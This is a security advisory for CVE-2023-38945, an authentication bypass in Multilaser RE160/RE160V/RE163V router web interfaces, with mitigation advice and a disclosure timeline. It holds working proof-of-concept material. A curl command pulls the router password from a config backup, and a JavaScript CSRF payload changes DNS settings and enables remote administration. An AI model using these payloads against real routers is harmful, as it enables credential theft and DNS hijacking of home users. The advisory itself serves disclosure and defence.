Multilaser RE160V / RE160 URL Manipulation Access Bypass

`=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38945]=======  
  
Access Control Bypass in Multilaser routers' Web Management Interface  
  
Author: Vinicius Moraes < vinicius.moraes.w () gmail com >  
  
=====[Table of  
Contents]========================================================  
  
1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References  
  
=====[1.  
Overview]==============================================================  
  
* Systems affected: Multilaser RE160 web interface -  
V5.07.51_pt_MTL01(verified)  
-  
V5.07.52_pt_MTL01(verified)  
(other routers/versions may be  
affected)  
Multilaser RE160V web interface - V12.03.01.08_pt  
(verified)  
- V12.03.01.09_pt  
(verified)  
(other routers/versions may be  
affected)  
Multilaser RE163V web interface - V12.03.01.08_pt  
(verified)  
(other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
the routers' web interface and perform management actions, such as  
changing the DNS settings, enabling router remote access,  
changing the  
IP routing table, and retrieving the WiFi and management  
application  
passwords. A noteworthy aspect also regards the fact that the  
attack  
can be conducted remotely.  
  
=====[2. Detailed  
description]==================================================  
  
The affected Multilaser routers have a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access routers' management features.  
  
In order to exploit this bug, it is necessary to add a specific extension  
at the  
end of the URLs. Some acceptable extension values are: js, css, png, jpg,  
gif,  
jsp. The following example shows how an unauthenticated user (not bearing a  
credential or session token) could perform it by using the curl tool[1] to  
retrieve, for example, a backup of the RE160 router config, which contains  
its  
web interface password:  
  
[snippet]  
  
$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E  
'HTTP/|Locatio'  
HTTP/1.0 302 Redirect  
Location: http://[routerIpAddress]/login.asp  
$  
$ # malicious unauthenticated request getting the web interface password  
$ # (in this example: "pass123")  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E  
'HTTP/|http_pass'  
HTTP/1.0 200 OK  
http_passwd=pass123  
  
[/snippet]  
  
Furthermore, the next example presents part of a JavaScript code that could  
be  
added to a malicious website with the purpose of changing the router's DNS  
address and enabling remote access on vulnerable RE160V and RE163V routers.  
This can be achieved by exploiting this access control issue and a CSRF[3]:  
  
[code]  
  
fetch('http://[routerIpAddress]/goform/setSysTools/.js', {  
'method': 'POST',  
'mode': 'no-cors',  
'headers': {  
'Content-Type': 'application/x-www-form-urlencoded'  
},  
'body':  
'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&  
module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'  
})  
  
[/code]  
  
By performing the aforementioned steps, an attacker can gain access to all  
features of the web interface.  
  
This vulnerability can be exploited remotely via a malicious website or a  
mobile/desktop application performing HTTP requests against the router. And  
also locally, by connecting to a vulnerable router (such as through the  
wireless  
infrastructure of a coffee shop or airport).  
  
=====[3. Other contexts &  
solutions]============================================  
  
Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the session token in authenticated features as a  
prerequisite  
for enforcing access control, regardless of any extension in the URL. Upon  
not  
receiving a valid session token within the request, users should be  
redirected  
to the login page.  
  
Practically, to mitigate this issue, the RE160V should be updated to  
firmware  
V12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].  
Multilaser informed that they contacted the firmware vendor of the model  
RE160,  
but due to the age of the equipment and its limitations, it will not  
receive an  
update to fix the issue. Therefore, it is recommended to replace the RE160  
router with a new one that has received the fix (such as RE160V or RE163V).  
  
=====[4.  
Acknowledgements]======================================================  
  
Joaquim Brasil de Oliveira < palulabrasil () gmail com >  
< twitter.com/palulabr >  
Tempest Security Intelligence[2]  
  
=====[5.  
Timeline]==============================================================  
  
13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)  
fixed  
the bug;  
28/04/2023 - The bug regarding model RE160V was reported to the vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;  
07/07/2023 - The same bug in model RE160 was reported to the vendor;  
16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) where  
the  
bug was fixed;  
26/10/2023 - Vendor informed that RE160 will not receive a fix;  
26/10/2023 - Vendor released the RE160V update on its website[4].  
  
=====[6.  
References]============================================================  
  
[1] https://curl.se  
[2] https://tempest.com.br  
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152  
[4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  
[5]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v  
  
`